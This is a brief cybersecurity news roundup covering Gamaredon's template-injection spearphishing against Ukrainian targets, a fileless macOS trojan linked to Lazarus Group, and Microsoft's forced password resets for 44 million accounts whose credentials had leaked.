Anomali yesterday published the results of their study into the activities of Gamaredon (or "Primitive Bear"), a Russian threat group active against targets in Ukraine. The targets include diplomats, government officials and employees, journalists, law enforcement, military officials and personnel, non-governmental organizations, and the Ministry of Foreign Affairs of Ukraine. The attackers are using sophisticated spearphishing lure documents that use Template Injection to download Document Template files, which then execute VBA Macros in the background.
A new Trojan designed for MacOS appears to belong to North Korea's Lazarus Group, Naked Security reports. Security researcher Patrick Wardle noted similarities to other strains of Lazarus Group malware, particularly Apple.Jeus. This new strain is fileless, and it can download and execute additional payloads while residing in the infected system's memory. The malware is distributed from a website posing as a cryptocurrency trading platform. BleepingComputer points out that fileless malware, while common in malware targeting Windows, is much less common for MacOS. The file isn't signed, so MacOS will trigger a warning before it's downloaded (although that won't stop everyone). It appears to be first-stage malware, as it doesn't seem to do anything on its own besides collecting system information and contacting a command-and-control server. Its goal is probably stealing cryptocurrency, which is in keeping with Lazarus Group's history of conducting financially motivated attacks.
Microsoft scanned a database of three billion leaked credentials and identified 44 million users who were still using compromised passwords, ZDNet reports. The company has already forced password resets for these accounts.